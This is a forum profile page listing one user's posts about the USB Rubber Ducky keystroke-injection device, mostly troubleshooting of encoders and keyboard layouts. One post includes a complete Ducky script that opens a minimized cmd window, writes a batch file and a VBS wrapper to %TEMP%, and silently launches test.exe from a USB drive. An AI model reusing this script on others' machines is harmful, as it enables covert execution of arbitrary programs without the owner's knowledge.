Jump to content

bytecode77

Active Members
  • Posts

    8
  • Joined

  • Last visited

Everything posted by bytecode77

  1. I just downloaded and used the current offline encoder and I figured out that the error lies somewhere else in another application. It has nothing todo with the rubber ducky. Thanks for your friendly advice, tho! Good to know there's an offline encoder anyway :)
  2. Also, as an update, I tested it again. Apparently this issue only occurs the second time I insert the USB drive into my computer. But then, the "^^" is consistent with all applications on my computer, CMD, notepad, even on my browser as I'm typing here. ^^
  3. I can't seem to find an encoder besides Ducky Toolkit. Can you point me to the encoder you mean?
  4. 1. I used the online encoder 2. I recently upgraded to the TwinDuck firmware 3. German language map. But it used to work with this setup, then it suddenly didn't.
  5. So I'm writing into a BAT file in order to achieve file execution. This is one line in that BAT file: for /f %%d in ('wmic volume get driveletter^, label ^| findstr "USBSTICK"') do set ddrv=%%d However, all the ^ are replaced with ^^. So in the end, the code is invalid. Also, even when writing in the forums right now in my browser, I still enter ^^ when pressing circumflex once. What happened? This is my ducky code: DEFAULT_DELAY 50 DELAY 2000 GUI r DELAY 750 STRING cmd /Q /D /T:78 /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE DOWNARROW ENTER DOWNARROW REPEAT 100 ENTER STRING cd %TEMP% ENTER STRING erase /Q test1.bat ENTER STRING copy con test1.bat ENTER STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "USBSTICK"') do set ddrv=%%d ENTER STRING if Exist %ddrv% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 15 ENTER STRING goto :while1 ENTER STRING :break ENTER STRING START %ddrv%\test.exe ENTER CONTROL z ENTER STRING erase /Q test1.vbs ENTER STRING copy con test1.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL z ENTER STRING wscript.exe test1.vbs test1.bat ENTER STRING exit ENTER
  6. Cool, working like a charm now. The setup was very easy. Thanks!
  7. I thought the rubber ducky stick would carry a storage. Do you really need 2 sticks for this exploit to work?
  8. Greetings, I use this example in order to run an exe file from the SD card. However, the SD card doesn't seem to get mounted, therefore, the exe file doesn't get executed. What am I doing wrong? Ps. Is it supposed to take that long to execute a file? Would it be save to reduce the typing delay or the delay for opening of cmd, etc.?
×
×
  • Create New...